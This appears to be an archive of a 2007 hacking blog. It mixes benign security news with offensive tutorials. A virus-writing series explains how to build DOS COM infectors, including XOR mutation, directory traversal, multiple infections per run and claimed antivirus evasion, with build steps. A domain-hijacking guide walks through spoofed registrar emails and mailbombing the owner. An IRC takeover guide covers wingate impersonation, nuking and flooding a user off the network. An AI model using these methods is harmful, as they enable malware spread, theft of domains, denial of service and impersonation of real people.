Hacking Base

the Art of Virology 03h

2007-11-27T16:35:00.001-08:00

…finally after three months of inactivity (exams, parties and so) I made some time to write this virus and this article… so for the ones who read this series… ENjOY =)

The Old School Virus

Yeah, I gave up writting infant-b because even the [a] version was full of bugs, and had to logicaly restructure the code so I could implement the things I promised for this virus, which bears the name Old School (oldskl)…

A mutant?

I said that in this virus I’m going to implement and encryption scheme, xor based one and mutational (this I forgot to mention). The basics of the XOR is that when comparing two bits, if there are the same the result is 0 (zero) and if different (1).

0 xor 0 = 0 0 xor 1 = 1 1 xor 0 = 1 1 xor 1 = 0

Well also you could use other functions as rotate (left or right), increase/decrease, and, or, not and any other variation of these… The mutation of the virus happens before every infection. It simply adds 1 to the key (which is of dimension byte maxvalue = 255) until it reaches 0FFh (255), moment when it resets the key to 1, not 00 because then the virus would be no more encrypted. So it has 253 posible states (255 and 00 are out)…

The famous transversal infection (.. or Dot Dot)

I had to implement a multi-directory infector. Not all the files are in one single directory, so I implemented the dotdot technique, nothing fancy it works as a simple cd .. command… it’s a clasic …

Multiple infections per run

Simple implementation, but heavy result…
Some info on how it works… I used a tree type infection, just to make it funkier…

]The first infection wave infects 5 files, including itself (the first)…

]]The second file infects other 4 files

]]]The third file infects other 3

]]]]The fourth other 2

]]]]]The fifth just 1

When these infected files are executed, the above scheme starts over again, but decreasing from the number the have. So after another infection wave the second infected files infects other 4 files which infect as follows:

]The first 3 files

]The second 2 files

]The third 1 file

]The fourth 1 file

I think you got the idea… After going to 1 infections per run it stays there and infect just 1 file per run…

Stealth

Actually semy stealth because it only saves the time and date of the file and save the attributes of the files (because it resets them)… Why does it reset the attributes of the files? Because this way it can infect read-only files…

COM’s

You need some COM files to play with this baby… so I created a batch file which will automatically create you ten COM files per run (5 normal, 5 read-only)… Here is the code for the createCOM.bat:

@echo off debug <> nul copy com.com 1.com > nul copy com.com 2.com > nul copy com.com 3.com > nul copy com.com 4.com > nul copy com.com 5.com > nul copy com.com 6.com > nul copy com.com 7.com > nul copy com.com 8.com > nul copy com.com 9.com > nul copy com.com 10.com > nul del com.com > nul attrib +R 1.com attrib +R 3.com attrib +R 5.com attrib +R 7.com attrib +R 9.com @echo off

Besides of this BAT file you also need the following file named gencom without any extension:

a100 mov ah, 4C int 21h nop nop nop nop nop nop

n com.com
rcx
A
w
q

I advice you to make 2 directories: one Virus and a subfolder Start… Place the virus you assemble in start, where you also run createCOM.bat, and also run createCOM.bat in the folder Virus… Atention if the file gencom isn’t in the same directory with the bat, then no com files will be created..

Give me the virus
Again don’t spread this virus… It would an ok virus about 20 years ago, but not it’s god damn old for these times…

Oldskl by backbone: oldskl.asm

The ending of 03…

If you understand everything until now than you know the basics of computer viruses… If not don’t panic (i didn’t also understand viruses at the beginning) the following article will be a fully detailed one about every function we used… for the ones that have learned a bit of assembly… for the others: check my first article and get a good assembly book to learn…

EOF

the Art of Virology 02h

2007-11-27T16:35:00.000-08:00

This is the one and only (and first article) which will present you the source code of a virus on Darknet, and a lame one too

Theory again…

First should mention a couple of things which haven’t been specified till now. This virus is going to be an appending virus:

An appending virus is a virus that writes all of his code to the end of the file, after which it writes a simple jump to the code at the start of the file

I will use this method, for first in the virus i’ll present here, maybe later I will adopt another technique as EPO:

Entry Point Obscuring is a method which inserts the entry point of the virus somewhere in the host file, where it can do an interception of the code for later replication, but not at the start.

…but definitely not overwriting viruses:

An overwriting virus has a simple routine to overwrite the host file, thus being easily detected because of the fact that infected files in 99% of cases won’t run anymore

Back to reality

So my first virus is called infant-a, because it only does a single thing (like an infant); also it is a DOS COM infecter, so you won’t have much trouble with it. What to say more, the source if fully commented, and if you have read the book I have suggested you in the 00h article than you won’t have any problems in understanding it.It is not detected by Avira anti virus, check it with other anti viruses and tell me if it found and under which name, oh yeah Kaspersky doesn’t find it either.

BTW: don’t compile and infect other files (computers) with it because I will look lame not you

The brilliant (and simple code) follows: infant-a

How to play with it?

Everything goes in 3 steps, or 2 depends on you…

1st step - dummy com files

Enter in DOS mode (run cmd from Windows run) and write the following lines:


C:\ >debug
-a100
xxxx:0100 mov  ax,4c00
xxxx:0103 int    21h
xxxx:0105 ^C
// this is a comment ^C means CTRL+C 
-rcx
CX 0000
:5
-n dummy.com
-w
Writing 00005 bytes
-q
C:\>copy dummy.com uninfectedFile.com

2nd step - compile the virus

For this one you need TASM & TLINK, google to get them; if you have them enter the following lines supposing infant-a.asm is the virus:


C:\ >tasm infant-a.asm
C:\ >tlink /t infant-a.obj
//comment: /t tells tlink to make it a dos image file = com file

3rd step - optional

Download DOSBox, install it and use the following commands (after starting DOSBox):


Z:\ >mount C:\ Folder\ Where\ The\ Virus\ And\ Dummy\ COM\ Files\ Are\ Located c:
//comment: c with : (c:) or without I don't remember exactly
Z:\ >C:
C:\ >
//comment: and now your C drive (in DOSBox) is C:\ Folder\ Where\ The\ Virus\ And\ Dummy\ COM\ FIles\ Are\ Located

Let’s play

And now you can start the virus and see how it infects one file per run, the dummy COM files should have 6 bytes length, and after infection 161, you can’t miss them…

Are we done already?

Well 02h is over, but 03h is there waiting to be written; whats next? infant-b of course which will have:

An encryption method (XOR)
A traversal infection (dotdot [..] method)
More infections per run
Stealth?

Till then have fun with infant-a, and see you as soon as possible (if anybody reads this series).

the Art of Virology 01h

2007-11-27T16:34:00.000-08:00

In this part we will discuss the basic framework of a computer virus… The basics of a virus consists of two elementary procedures (others will tell you three). These are:

a search routine
a infection routine
[anti-detection routines]

The search routine

This routine will have to be a more delicate one [but not hard to analyze at all], because as besides the search routine itself we will include file validation two, we will check within this routine if the file is read-only file, not as in some cases in which I saw that the virus search the file, found it and only when trying to infect it he realised that is read-only, and if no check done for it the virus would crash.

The infection routine

The trivial routine in a virus, because we do not need a search routine if we say for example we make a list of wanted to infect files, this routine (in COM viruses) will only write the whole virus in the host program and write a jump to it at the start of the file… simple don’t you think?

Pseudo-Code Virus

I know it’s the second article and what do you get? only a pseudo-code virus, but be pacient because I’m not so trustful to think that you have already read the book I recommended you in the first part… so wait until the 02h will be out; till then let’s check out our first virus:

virusName "infant-alfa"     
virusAuthor "backbone"    

begin
  SEARCH:
     if find_com_file is true then INFECT
     else SEARCH
  INFECT:
     if file_read_only then SEARCH
     else OPEN_WRITE
       OPEN_WRITE:
          write_virus from virusName to FINISH
          write jump to virusName at start_of_host_program

          //jump in machine-code = 0e9h

          if write_ok goto FINISH
          else SEARCH
  FINISH:
end

If you don’t like it in pseudo-code, maybe you’ll like it in Pascal, so dowload Dirty Nazi Virus Generator and create a virus to analyze… I didn’t try them out but in theory it should work fine… if you don’t have a pascal compiler you can try freepascal…

What more do I need to know before actually starting to write viruses?

This is an excellent question because even if the actual search and infect routine are simple to build in assembly, the DTA (Disk Transfer Area) is a little hard to understand so i’ll give you a book which will jump in your help (I advice you to read only the DTA part because the rest of it and even more I’ll treat them myself)…

The Little Black Book Of Computer Viruses

Almost forgot to mention, the password to the archive is Ludwig with the big L.

Another bitter end…

So this second part of the Art of Virology which is a bit easier to diggest than the first one, has finally ended. See you next time and hope that by the next chapter you have learned asm and read about the DTA… till then take five…

Thousands Hooked by Malware from Big Sites

2007-11-25T18:15:00.000-08:00

If I recall this is not the first time this has happened, delivering viral payloads via banner ads and flaws in scripting.

It seems that malware peddlers are getting more aggressive though, it obviously shows there is actual monetary value in infecting people and stealing their data.

A subtle form of social engineering too, by leveraging on the trust a user gives to a big name site, they also pass that trust on to the banner ads displayed on that site.

Thousands of PC users have been duped into surrendering sensitive information and installing malicious software after falling victim to a complex scam that continues to plague well-known websites, a researcher warns.

The scam is the latest to piggyback on banner ads that are fed to high-traffic destinations. Malicious code hardwired into the ads prompts a pop-up that warns of a bogus security threat on the visitor’s machine. It offers to fix the problem in exchange for a fee and for credit card information. The ad then attempts to install a back door on the victim’s machine.

There are thousands of sites with these malware infested banner ads running, so be careful. It seem you’re no longer safe even if you stay away from the seedier parts of the web.

I’d guess though the vast majority of readers here wouldn’t be stupid enough to download a prompted ’security’ fix which randomly appeared.

Jackson estimates the rogue ads have appeared on anywhere from “several hundred to 1,000″ sites, which tend to be related to television and entertainment. Based on unique signatures of the javascript used in the attack, which researchers have seen passing over the net, he estimates thousands of people have fallen for the ruse.

Jackson has managed to shut down at least two servers serving the bad ads, but warns at least two more are still operational. He declined to identify the servers or the websites by name.

I hope they manage to shut down the rest and save all the witless morons surfing the web from more infestations and information leakage.

Doubleclick Involved in Malware Distribution

2007-11-25T18:14:00.000-08:00

We recently reported on thousands of people being hooked by big sites distributing malware, it now seems Doubleclick was the one at fault.

It’s a pretty neat trick and a good spin on Social Engineering leveraging on the trustworthy nature of the sites.

CNN even?

Rogue anti-spyware software that pushes fraudulent PC scans has found its way onto DoubleClick and legitimate sites, including CNN, The Economist, The Huffington Post and the official site of the Philadelphia Phillies.

DoubleClick officials told eWEEK that they have recently implemented a security monitoring system to catch and disable a new strain of malware that has spread over the past several months. This system has already captured and disabled about 100 ads, the company said in a statement, although it didn’t mention this episode in particular.

The bogus anti-spyware onslaught is only part of a bigger wave that’s also included porno ads being swapped for normal ads on sites such as The Wall Street Journal. It’s not yet clear whether the same fraudsters are behind both the porn and the fraudulent anti-spyware ads.

I really hope they do put some serious measure in place that don’t just use a signature for this particular case…something a little more intelligent I hope.

Sunbelt Software has confirmed that Trojans were being downloaded from ads served by DoubleClick as recently as Nov. 11. This malware is the kind that repeatedly pops bogus warning messages about computer infections in users’ faces until they give up in despair and pay $30 to $40 for a junk “security” program.

“The stuff that’s installed is this rogue anti-spyware software that … gives you fake alerts, [such as] ‘Your computer is infected, you must run this.’ Basically it’s extortion. … They try to push you to buy their software,” Sunbelt President Alex Eckelberry told eWEEK.

The malware application is a variant on WinFixer, a piece of malware that pretends to be a diagnostic tool.

I hope we can educate people about these kind of things, sad to say as some of the comments mentioned in the previous post…a lot of people will fall for this - why? Simply because they don’t know any better.

Social Engineering Gets a Big Diamond Heist

2007-11-25T17:58:00.000-08:00

It just goes to show, sometimes the simple things are the most effective. A box of chocolates can defeat all the most hi-tech security systems if you add a little charm.

21 million Euros of diamonds, that’s one hell of a catch.

A thief has evaded one of the world’s most expensive hi-tech security systems, and made off with â‚¬21m (Â£14.5m) worth of diamonds - thanks to a secret weapon rarely used on bank staff: personal charm.

In what may be the biggest robbery committed by one person, the conman burgled safety deposit boxes at an ABN Amro bank in Antwerp’s diamond quarter, stealing gems weighing 120,000 carats. Posing as a successful businessman, the thief visited the bank frequently, befriending staff and gradually winning their confidence. He even brought them chocolates, according to one diamond industry official.

Sounds like a long term operation, very slickly done indeed!

Mr Claes said of the thief: “He used no violence. He used one weapon -and that is his charm - to gain confidence. He bought chocolates for the personnel, he was a nice guy, he charmed them, got the original of keys to make copies and got information on where the diamonds were.

“You can have all the safety and security you want, but if someone uses their charm to mislead people it won’t help.”

My dear friend, education is the key..not more locks and bolts.

Huge Online Loss by Swedish Bank Nordea - Claimed to be Biggest Loss?

2007-11-25T17:57:00.000-08:00

A massive online heist, some (like McAfee) claim it’s the biggest ever online sting involving a bank, it’s comes in at about half a million pounds or or $1.1 million USD.

Using some l33t0 custom trojan, it seems to be more a case of lack of education and the whole situation could have been avoided by using 2 factor authentication such as hardware tokens or SMS verification.

Swedish bank Nordea has told ZDNet UK that it has been stung for between seven and eight million Swedish krona â€” up to Â£580,000 â€” in what security company McAfee is describing as the “biggest ever” online bank heist.

Over the last 15 months, Nordea customers have been targeted by emails containing a tailormade Trojan, said the bank.

Nordea believes that 250 customers have been affected by the fraud, after falling victim to phishing emails containing the Trojan. According to McAfee, Swedish police believe Russian organised criminals are behind the attacks. Currently, 121 people are suspected of being involved.

If it’s a custom trojan I don’t see how anti-viral software would have helped, but then…executives and corporates tend to talk a lot of crap when it comes to technical issues.

Nordea spokesman for Sweden, Boo Ehlin, said that most of the home users affected had not been running antivirus on their computers. The bank has borne the brunt of the attacks, and has refunded all the affected customers.

Ehlin blamed successful social engineering for the heist, rather than any deficiencies in Nordea security procedures.

“It is more of an information rather than a security problem,” said Ehlin. “Codes are a very important thing. Our customers have been cheated into giving out the keys to our security, which they gave in good faith.”

As always just be wary, no point preaching here as the people reading this site know not to open random executables sent from anywhere unless they are signed and md5 hashed

Domain Stealing or How to Hijack a Domain

2007-11-25T17:48:00.000-08:00

Please note this is an old technique again, just for learning purposes, learn how the old techniques worked and why they worked, then try and discover new ways to do things.

Summary

The sole purpose of the information contained in this advisory is to point out the flaws in InterNIC’s domain name handling system and is intended for educational use only. Since this is public knowledge, it should be also in everyone’s reach.

The technique described below involves an easy to follow procedure of stealing .com/.net/.org/.gov/.mil domain names.

This vulnerability has been publicly known for quite a while, and there are ways to prevent it. The procedure below enables an attacker to take over a domain name, enabling him or her to make the arbitrary web address (www.example.com) point to any desired web page on the Internet. This method of domain hijacking is constantly being used to hijack domain names, and to deface web sites.

THIS DOCUMENT SHOULD NOT BE USED FOR ANY ILLEGAL ACTIVITY.

Details

Required ingredients:

Anonymous remailer or mail bomber that can spoof email addresses.
Social Engineering skills for timing the emails.
A fake email address at hotmail.com or any other free service.

Exploit:
As an example for this advisory, we will take the domain name example.org. Go to http://www.networksolutions.com and click on the link that says ‘Who Is.’ Now enter the domain name (example.org in this case) in the search field and click on the ‘Search’ button. This would show you the WhoIs information, which will be similar to the one shown below:

Registrant:
Example (ex24-DOM)
  Address details

  Domain Name: EXAMPLE.ORG

  Administrative Contact, Technical Contact, Zone Contact,
  Billing Contact:
     DOMAIN, ADMIN (ADM001) ADMINEMAIL@EXAMPLE.COM

  Record last updated on 00-Jan-2000.
  Record created on 00-Jan-2000.
  Database last updated on 3-Feb-2000 14:29:53 EST.

  Domain servers in listed order:

  NS1.EXAMPLE.COM 1.2.3.4
  NS2.EXAMPLE.NET 1.2.3.5

Now you have two choices:

1) Either you could take full control of the domain by changing the Administrator’s handle information.

2) You could simply point the domain to another host and let it recover in time by itself.

Initiating the First Attack:

Let us first explain the InterNIC authentication system in case most of you would be the readers who do not have their own domain names. The problem with InterNIC authentication is that they do NOT send a confirmation email if the request is sent from the same email as the person owning the contact or the domain name itself! Therefore, utilizing this flaw one could spoof anyone’s email address and change any domain name’s information.

Although, a confirmation is required from the person to whom the domain is about to be transferred; and that shouldn’t be too hard as it would your own email address.

Here’s a step-by-step procedure:

Go to http://www.networksolutions.com/
Click on the link that says ‘Make Changes.’
Enter the domain name example.org
You should be presented with 2 blue buttons
Click on the one that says *Expert*
Next screen would have a heading ‘Select the form that meets your needs’
Click on the link that say ‘Contact Form’
Next you should see a form with 2 fields.
In the first field enter the admin’s handle (example.org admin is ADM001)
In the next field enter his/her email address (in this case it’s ADMINEMAIL@EXAMPLE.COM)
Change the option to ‘Modify.’
Now ‘Proceed to Contact Information.’
Select the MAIL-FROM option and click the ‘Go on to Contact Data Information.’
Now you should see all the information about the admin contact of domain
name!
In the E-mail address field change the email to your own fake email. (in this case it’s evil@domain.com)
Now ‘Proceed to Set Authorization Scheme.’
Again choose MAIL-FROM and enter the email address of the admin (ADMINEMAIL@EXAMPLE.COM)
Leave the bottom option to ‘No’ and ‘Generate Contact Form.’

Now you should see a template with all the information. Similar to this:

******** Please DO NOT REMOVE Version Number ********

Contact Version Number: 1.0

******** Please see attached detailed instructions ********

Authorization
0a. (N)ew (M)odify (D)elete.: Modify
0b. Auth Scheme.............: MAIL-FROM
0c. Auth Info...............:

Contact Information
1a. NIC Handle..............: ADM001
1b. (I)ndividual (R)ole.....: Individual
1c. Name....................: DOMAIN, ADMIN
1d. Organization Name.......: EXAMPLE
1e. Street Address..........:
1f. City....................:
1g. State...................:
1h. Postal Code.............:
1i. Country.................:
1j. Phone Number............:
1k. Fax Number..............:
1l. E-Mailbox...............: evil@domain.com

Notify Information
2a. Notify Updates..........: AFTER-UPDATE
2b. Notify Use..............: AFTER-USE

Authentication
3a. Auth Scheme.............: MAIL-FROM
3b. Auth Info...............: ADMINEMAIL@EXAMPLE.COM
3c. Public (Y/N)............: NO

NOTE: Do NOT press the button at the bottom that says ‘Mail this contact form to me!’

Copy and paste this message into your anonymous remailer or mailbomber and you are ready to go; but WAIT! It’s not that easy, now comes the HARD part! When you mail this message to hostmaster@networksolutions.com a message similar to the following would be sent to the admin email address:

Subject: [NIC-000128.4r50] Your Mail
______________________________________________________________
This is an automatic reply to acknowledge that your message has been received by hostmaster@networksolutions.com. This acknowledgement is "NOT" a confirmation that your request has been processed. You will be notified when it has been completed.

If you should have need to correspond with us regarding this request, please include the tracking number [NIC-000128.4r50] in the subject. The easiest way to do this is simply to reply to this message.

If you have not already done so, please come and visit our site via www browser or ftp and pick-up the latest domain template or review the Domain Name Registration Service Agreement at the URL's:

  Domain Name Registration Service Agreement
     http://www.networksolutions.com/legal/service-agreement.html
  Domain Name Registration Template
     ftp://www.networksolutions.com/templates/domain-template.txt

Regards,
Network Solutions Registration Services

***********************************************

***********************************************
IMPORTANT INFORMATION
***********************************************
On January 15, 2000, Network Solutions introduced Service Agreement, Version 6.0. All versions of the Service Agreement template will continue to be accepted and processed until January 31, 2000. On and after February 1, 2000, please use the Network Solutions Service Agreement, Version 6.0 template located at
ftp://www.networksolutions.com/templates/domain-template.txt
for all template requests.

The terms and conditions of the Service Agreement are available on our Web site at: http://www.networksolutions.com/legal/service-agreement.html.
************************************************

The zone files, which make the Internet work, are normally updated twice daily, 7 days a week at 5:00 AM and 5:00 PM U.S. Eastern Standard Time. Requests that are completed before these times will be included in that 12-hour zone file update and will normally begin to take effect within 5-6 hours.

Should you wish to modify or delete an existing domain name registration, you can do so online, using our Service Agreement. You can change the registrant's address, replace a contact/agent with a different contact/agent, or change primary and/or secondary name server information.

To update information about an existing contact, such as postal address, e-mail address or telephone number, complete and submit the Contact Form to hostmaster@internic.net. This form is available on our Web site at www.networksolutions.com

To register or update information about a name server, complete and submit the Host Form to hostmaster@internic.net. This form is also available on our Web site.

Network Solutions Registration Services
e-mail: help@networksolutions.com

You should now be thinking that this message could get you in trouble but there is a way of getting rid of this trouble. Here you’ll use your mailbomber to mailbomb the guy with 20-30 similar messages if you want your attack to be successful. The person would see 35 messages from the same address and therefore would delete all of them and you’d probably be safe. If he ‘would’ email someone then he would probably reply to the wrong tracking number. In the above case, the tracking number is [NIC-000128.4r50]. OK, here another hard part. You have to open your notepad and generate similar numbers actually come up with them.

You should NEVER mailbomb the person with the same tracking number. What we mean
is that you should never send more than one emails to him from [NIC-000128.4r50] in the next email, change the [NIC-000128.4r50] to [NIC-000127.5089] or something different. Here is a list of some numbers that we generated just to give you a good idea of how the scheme works.

[NIC-000127.5089]
[NIC-000128.4rg7]
[NIC-000128.523f]
[NIC-000127.53d0]
[NIC-000129.r609]
[NIC-000128.3f6y]
[NIC-000128.5d8t]
[NIC-000127.r509]
[NIC-000128.4r30]
[NIC-000127.d307]

Remember to change the number at both places. In the subject as well as the email body!

In the case of example.org you will send the email messages to ADMINEMAIL@EXAMPLE.COM from hostmaster@internic.net. The message subject and body are already described above.

Stop after you have mailed him/her 10-15 messages! Now it’s time to email hostmaster@networksolutions.com with our fake email as ADMINEMAIL@EXAMPLE.COM So again, in this case the message will be sent to hostmaster@networksolutions.com from ADMINEMAIL@EXAMPLE.COM with the following template that we created above:

******** Please DO NOT REMOVE Version Number ********

Contact Version Number: 1.0

******** Please see attached detailed instructions ********

Authorization
0a. (N)ew (M)odify (D)elete.: Modify
0b. Auth Scheme.............: MAIL-FROM
0c. Auth Info...............:

Contact Information
1a. NIC Handle..............: ADM001
1b. (I)ndividual (R)ole.....: Individual
1c. Name....................: DOMAIN, ADMIN
1d. Organization Name.......: EXAMPLE
1e. Street Address..........:
1f. City....................:
1g. State...................:
1h. Postal Code.............:
1i. Country.................:
1j. Phone Number............:
1k. Fax Number..............:
1l. E-Mailbox...............: evil@domain.com

Notify Information
2a. Notify Updates..........: AFTER-UPDATE
2b. Notify Use..............: AFTER-USE

Authentication
3a. Auth Scheme.............: MAIL-FROM
3b. Auth Info...............: ADMINEMAIL@EXAMPLE.COM
3c. Public (Y/N)............: NO

NOTE: Do NOT put anything in the Subject!

Just send one email! DO NOT bomb hostmaster@networksolutions.com with more than one email. That’s pretty much it. Now continue to bomb ADMINEMAIL@EXAMPLE.COM, changing the tracking number every time until your 30-35 tracking numbers are used up!

Now all you have to do is wait. After 24 hours you could go and change the domain information and no one would be there to stop you because now you are the admin of the domain name!

NOTE: This attack will only work on domains that have an admin contact different from their technical contact!

Initiating the Second Attack:

This attack will be successful even if the technical and admin contact are the same.
The procedure is basically the same apart from the fact that this time:

Go to http://www.networksolutions.com/
Click on the link that says ‘Make Changes.’
Enter the domain name example.org
You should be presented with 2 blue buttons
Click on the one that says *Expert*
Next screen would have a heading ‘Select the form that meets your needs’
Click on the link that say ‘Service Agreement.’
Now when it asks for email address, enter your own.
Now you should see many fields, don’t panic!
Go to the technical contact and change the handle to freeservers, hypermart e.t.c.
Now come to ‘Nameserver Information.’
Change the nameservers to hypermart or freeserver nameservers.
If there’s anything in the ‘Optional Information’ after that then simply delete them.
Click on the button ‘Submit this form for processing.’

You are done, the form will be emailed to your email address. When the form arrives in your email, then simply take this part:

**** PLEASE DO NOT REMOVE Version Number or any of the information below when submitting this template to hostmaster@networksolutions.com. *****

Domain Version Number: 5.0

******** Email completed agreement to hostmaster@networksolutions.com ********

AGREEMENT TO BE BOUND. By applying for a Network Solutions' service(s) through our online application process or by applying for and registering a domain name as part of our e-mail template application process or by using the service(s) provided by Network Solutions under the Service Agreement, Version 5.0, you acknowledge that you have read and agree to be bound by all terms and conditions of this Agreement and any pertinent rules or policies that are or may be published by Network Solutions.

Please find the Network Solutions Service Agreement, Version 5.0 located at the URL href="http://www.networksolutions.com/legal/service-agreement.html"> http://www.networksolutions.com/legal/service-agreement.html.

[ URL ftp://www.networksolutions.com ] [11/99]

Authorization
0a. (N)ew (M)odify (D)elete.........: M Name Registration
0b. Auth Scheme.....................: MAIL-FROM
0c. Auth Info.......................:

1. Comments........................:

2. Complete Domain Name............: example.org

Organization Using Domain Name
3a. Organization Name................: EXAMPLE
3b. Street Address..................:
3c. City............................:
3d. State...........................:
3e. Postal Code.....................:
3f. Country.........................:

Administrative Contact
4a. NIC Handle (if known)...........: ADM001
4b. (I)ndividual (R)ole?............: Individual
4c. Name (Last, First)..............:
4d. Organization Name...............:
4e. Street Address..................:
4f. City............................:
4g. State...........................:
4h. Postal Code.....................:
4i. Country.........................:
4j. Phone Number....................:
4k. Fax Number......................:
4l. E-Mailbox.......................:

Technical Contact
5a. NIC Handle (if known)...........: BDM002
5b. (I)ndividual (R)ole?............: Individual
5c. Name(Last, First)...............:
5d. Organization Name...............:
5e. Street Address..................:
5f. City............................:
5g. State...........................:
5h. Postal Code.....................:
5i. Country.........................:
5j. Phone Number....................:
5k. Fax Number......................:
5l. E-Mailbox.......................:

Billing Contact
6a. NIC Handle (if known)...........: ADM001
6b. (I)ndividual (R)ole?............: Individual
6c. Name (Last, First)..............:
6d. Organization Name...............:
6e. Street Address..................:
6f. City............................:
6g. State...........................:
6h. Postal Code.....................:
6i. Country.........................:
6j. Phone Number....................:
6k. Fax Number......................:
6l. E-Mailbox.......................:

Prime Name Server
7a. Primary Server Hostname.........: NS1.EXAMPLE.COM
7b. Primary Server Netaddress.......: 1.2.3.4

Secondary Name Server(s)
8a. Secondary Server Hostname.......: NS2.EXAMPLE.NET
8b. Secondary Server Netaddress.....: 1.2.3.5

END OF AGREEMENT

For instructions, please refer to:
"http://www.networksolutions.com/help/inst-mod.html"

Now launch your anonymous remailer or mailbomber.

From: the domain admin (ADMINEMAIL@EXAMPLE.COM in this case).
To: hostmaster@networksolutions.com
Subject: (do not enter any subject, leave the field blank!)
Body: the template you created above.
You are ready to go but before you send this email to InterNIC, remember to bomb ADMINEMAIL@EXAMPLE.COM with similar emails but different tracking numbers as we did in the first procedure.
After sending 10-20 emails, send the above template to InterNIC.
Continue bombing your 40 messages. Remember to generate 40-50 tracking numbers.
This is basically it.
The domain would be transferred to freeservers or hypermart and then you could simply activate it from there on your own email address. Remember to use a fake email.

Nameservers and Handles:

Freeservers Technical Handle: FS4394
Primary Nameserver: NS3.FREESERVERS.COM
Primary Nameserver IP Address: 209.210.67.153
Secondary Nameserver: NS4.FREESERVERS.COM
Secondary Nameserver IP Address: 209.210.67.154

Hypermart Technical Handle: DA3706-ORG
Primary Nameserver: NS1.HYPERMART.NET
Primary Nameserver IP Address: 206.253.222.65
Secondary Nameserver: NS2.HYPERMART.NET
Secondary Nameserver IP Address: 206.253.222.66

______________________________________________________________

Possible Fixes:

Enable the CRYPT-FW password mechanism. This should prevent anyone without this password from changing your domain information (see the Internic contact form for more information)

US Sailors Information Leaked on The Web

2007-11-25T17:47:00.001-08:00

Another HUGE information leak from the US government, seems they can’t help themselves.

Or perhaps people are just ramping up the efforts against them..

The Navy has begun a criminal investigation after Social Security numbers and other personal data for 28,000 sailors and family members were found on a civilian website.

The Navy said Friday the information was in five documents and included people’s names, birth dates and Social Security numbers. Navy spokesman Lt. Justin Cole would not identify the website or its owner, but said the information had been removed. He would not provide any details about how the information ended up on the site.

They really need to step up their standards and training, and of course use some kind of file based or filesystem encryption, a stolen laptop shouldn’t yeild so much information.

The breach regarding the Navy comes amid a rash of government computer data thefts, including one at the Agriculture Department earlier this week in which a hacker may have obtained names, Social Security numbers and photos of 26,000 Washington-area employees and contractors.

As many as 26.5 million veterans and current military troops may have been affected by the theft of a laptop computer containing their Social Security numbers and birth dates. The computer was taken from the home of a Veterans Affairs Department employee in early May, and officials waited nearly three weeks before notifying veterans on May 22 of the theft.

That’s a hell of a lot of people to be effected..

How to get Ops and takeover a channel on IRC Hack Hacking

2007-11-25T17:47:00.000-08:00

I’ve been spending a lot of time online lately reading all kinds of stupid text files on how to “Takeover Ops Boi!!!”, “eLeEt WaYs To gEt OpS!!!”, “HOW TO GET OPS ON SERVER SPLITS”, etc. We all know none of these things work, at least not for me. They’re either written by morons, or they were written like 10 years ago and don’t work anymore. The method I’m presenting here DOES work, but it takes practice, patience, and careful reading.

Tools needed

An IRC script that can do mass deops quickly and easily (preferibly one that lets you press an F# (function) key to do mass deops, or one that automatically mass deops once you gain ops). You don’t want to have to start going through popup menus since you have to do this quickly.

An IRC script that can do mass CTCP versioning. I’ll explain later.

A wingate scanner. These aren’t too hard to find. Check http://packetstorm.linuxsecurity.com/wingate-scanner/

A few ‘war’ programs to exploit irc clients, nuke, flood, etc. When I say flood, I don’t mean like a ping flood in mIRC, I mean like a real ICMP flooder. Try to find Final Fortune, it’s a program I made myself… very effective.

A lot of patience.

A brain.

Process

Find a channel you want to takeover. This method will NOT work on Dalnet or any other networks with anything like ChanServ. Also, this won’t work if all of the ops in the channel are bots (unless they’re VERY badly programmed). OK, so once you’re in the channel, do a Version CTCP on all of the ops in there. Look for exploitable scripts (some versions of ircN, mIRC 5.3x, mIRC 5.4, etc.). Now, let’s say you find someone with nick ‘DumbOP’ and he’s using a script that you know you can exploit and disconnect him from IRC (but don’t crash him yet!).

/dns DumbOP to find his IP. Now take your handy wingate scanner. Plug in his IP and search for a similar one with the scanner. If you can’t find one in the same Class C range, try Class B if you have to, but make sure it resolves to something close to DumbOP’s IP.

Good, so now you have a wingate IP similar to DumbOP’s. If you couldn’t find an IP close to his, try this with another op with an exploitable script. Do a /whois DumbOP to find the IRC server he’s on and his ident (the thing before the @ip). So now that you have the wingate IP, what do you do with it? I’ll assume you never wingated before, and I’ll explain how to do it with mIRC. For
the example, let’s say the wingate IP is 1.2.3.4, DumbOP’s ident is ‘opident’, and DumbOP’s irc server is ‘irc.server.net’.

Open a new instance of mIRC, and in the status window, do the following:

/server 1.2.3.4 23

You’ll see it say “WinGate>NICK (some nick)”

Right after you see this, type:

/quote irc.server.net 6667

You’ll probably then see something like

“Connecting to host USER…Host name lookup for USER failedirc.server.net 6667
Connecting to host irc.server.net…connected”

You might see more than this, you might see less. The important thing to watch for is:

” -1.2.3.4- *** Looking up your hostname…
-1.2.3.4- *** Checking Ident
-1.2.3.4- *** Found your hostname
-1.2.3.4- *** Got Ident response ”

Once you see that, type:

/quote user opident opident opident opident
/quote nick DumbOP1

You don’t have to use ‘DumbOP1′, just use any temporary nick you want. Also, you can use ‘/raw’ instead of ‘/quote’ if you wish.

If you did everything correctly, you’ll see the MOTD for the irc server, and you’ll be connected. If by chance 1.2.3.4 is k-lined from irc.server.net, you’ll have to go through the whole process again with a different server. This makes your “spoofing” (it’s not REALLY spoofing) attempt less realistic looking, but if you have to use a different server, then do it.

Once you’re online, everything works like normal. Do a /whois DumbOP1 to see your info. It should be close to DumbOP’s.

You’re halfway there! The next thing to do (not necessary, but recommended) is to try to find out some info on DumbOP. I recommend trying “nbtstat -A ” at the dos prompt, that might provide you with a name or two if you’re lucky. This is just some useful information that might
come in handy. Also, try searching ICQ for his nick and check his info, you might find good stuff in there.

The next step is to disconnect DumbOP from IRC. Either use an exploit, or nuke him (Click is sometimes useful (if you don’t know what Click is, it’s a program made by Rhad to have an IRC server ‘nuke’ a person… it sometimes works)), or ICMP flood him. Do anything you have to to disconnect him. By the way, you should have your original IRC session still open, with your
wingated IRC session running as a different instance of mIRC (you should have 2 ‘versions’ of mIRC running at the same time now, one with your original nick, info, etc., and the other with the DumbOP1 stuff). While you’re attacking DumbOP, monitor the channel with your original session of mIRC and wait for DumbOP to disconnect. Immediately after you see that, rename DumbOP1 to DumbOP (/nick DumbOP) and join the channel! Don’t say anything! If you’re lucky, a stupid op will op you. Then mass deop. If nothing happens for about 5 or 6 minutes, mass message the ops, saying something like “what happened? why am I not opped?”. You might get into a conversation. Remember to keep calm, and talk like an op. Don’t freak out and demand for them to op you. The “useful information” might come in handy now. Often the ops will tell you to get ops from the bots. Just say something like you’re desynched from the bots because of your ping timeout.

